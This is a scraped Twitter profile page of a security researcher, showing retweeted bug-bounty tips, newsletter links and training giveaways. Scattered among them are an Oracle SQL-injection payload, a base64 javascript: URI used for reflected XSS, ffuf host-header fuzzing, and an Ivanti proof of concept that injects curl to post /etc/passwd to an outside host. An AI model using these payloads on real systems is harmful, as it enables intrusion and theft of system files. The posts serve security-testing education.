dineshsec(@nanicyb) 's Twitter Profileg
dineshsec

@nanicyb

Ethics | transmit security | eJPT | Yogosha

ID:3249519890

calendar_today19-06-2015 05:42:36

1,8K Tweets

679 Followers

627 Following

haksec.io(@haksecio) 's Twitter Profile Photo

Using Nuclei to identify hostnames associated with an ASN using the PTR fingerprinting template!

⌨️ echo <ASN> | nuclei -id ptr-fingerprint

Use this to help you map a target's network structure and identify potential targets for further testing.

Using Nuclei to identify hostnames associated with an ASN using the PTR fingerprinting template! ⌨️ echo <ASN> | nuclei -id ptr-fingerprint Use this to help you map a target's network structure and identify potential targets for further testing.
account_circle
Jason Haddix(@Jhaddix) 's Twitter Profile Photo

A new Executive Offense newsletter is out!

Episode #12 - The Training Landscape Pt. 1 (link 👇)

executiveoffense.beehiiv.com/p/cybersecurit…

Don't forget to subscribe!

A new Executive Offense newsletter is out! Episode #12 - The Training Landscape Pt. 1 (link 👇) executiveoffense.beehiiv.com/p/cybersecurit… Don't forget to subscribe!
account_circle
Godfather Orwa 🇯🇴(@GodfatherOrwa) 's Twitter Profile Photo

Let’s made something new
Let’s keep this tweet for question’s

You can ask me here in a comment and will answers in a comment , and let’s everyone learn and found some useful questions/answers

keep this tweet as reference by re-tweet

tips ✌️

account_circle
𐰚𐰼𐰇𐱅(@ynsmroztas) 's Twitter Profile Photo

If you discover an oracle web app, you can use this payload

EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--

If you discover an oracle web app, you can use this payload EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82-- #BugBounty
account_circle
Corben Leo(@hacker_) 's Twitter Profile Photo

3/ Ran:

$ curl https://██ -H 'Host: invalid12345.apps.███\.com'

Response:

> 404 Not Found: Requested route ('invalid12345.apps.███\.com') does not exist.

I brute-forced the host header with ffuf:

$ ffuf -u https://██ -H 'Host: FUZZ.apps.███\.com' -mc all -fw 9

account_circle
Nithin 🦹‍♂️(@thebinarybot) 's Twitter Profile Photo

SQL Injection is a P1 critical vulnerability and you will get $$$$ for reporting this.

Learn how to use SQLMap to find your first SQL Injection vulnerability in this thread 👇

SQL Injection is a P1 critical vulnerability and you will get $$$$ for reporting this. Learn how to use SQLMap to find your first SQL Injection vulnerability in this thread 👇
account_circle
Ozgur Alp(@ozgur_bbh) 's Twitter Profile Photo

Do you have a blind error based SQL injection, which you cannot exploit further? If that's the case, here is my blog post titled 'Turning Blind Error Based SQL Injection Into An Exploitable Boolean One' which covers an additional technique to exploit. link.medium.com/rNOGW2mujHb

account_circle
Vikas Anand(@kingcoolvikas) 's Twitter Profile Photo

I found a url like this :
domain.io/redirect?url=s…

encoded javascript:alert('Xss by vikas') to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
domain.io/redirect?url=a…

Which result in Reflected XSS:

I found a url like this : domain.io/redirect?url=s… encoded javascript:alert('Xss by vikas') to base64 like : amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik= Now the new url is like this : domain.io/redirect?url=a… Which result in Reflected XSS: #bugbounty #xss #infosec
account_circle
𐰚𐰼𐰇𐱅(@ynsmroztas) 's Twitter Profile Photo

Make sure to check whether the IVANTI targets are update🥳

Poc:
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx

I earned $4,100 for my submission on @bugcrowd bugcrowd.com/b1

Make sure to check whether the IVANTI targets are update🥳 Poc: https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx I earned $4,100 for my submission on @bugcrowd bugcrowd.com/b1 #ItTakesACrowd #bugbountytips #BugBounty
account_circle
Arshad Kazmi(@arshadkazmi42) 's Twitter Profile Photo

🕵️‍♂️ Inspired by @Godfatherorwa's GitHub recon methodology, I dug into Docker Hub layers & struck gold! 🪙 Bug bounty hunters, this is a treasure trove of exposed employee credentials! 🔍💰
(1/3)

account_circle
drak3hft7(@drak3hft7) 's Twitter Profile Photo

Today I found a subdomain takeover in azure. I must say that the guide created by godiego is fantastic. Link: godiego.co/posts/STO-Azur…

Today I found a subdomain takeover in azure. I must say that the guide created by @_godiego__ is fantastic. Link: godiego.co/posts/STO-Azur… #BugBounty #bugbountytip
account_circle
Nikhil Mittal(@nikhil_mitt) 's Twitter Profile Photo

I am giving away 1 seat each for our upcoming bootcamps.

Azure Cloud Attacks (CARTP) - 3rd Feb (9:00 AM ET)

Active Directory Attacks (CRTP) - 4th Feb (9:00 AM ET)

Please Reply, Like and Repost to participate. The winners will be announced on Friday 2nd Feb 2024.

I am giving away 1 seat each for our upcoming bootcamps. Azure Cloud Attacks (CARTP) - 3rd Feb (9:00 AM ET) Active Directory Attacks (CRTP) - 4th Feb (9:00 AM ET) Please Reply, Like and Repost to participate. The winners will be announced on Friday 2nd Feb 2024.
account_circle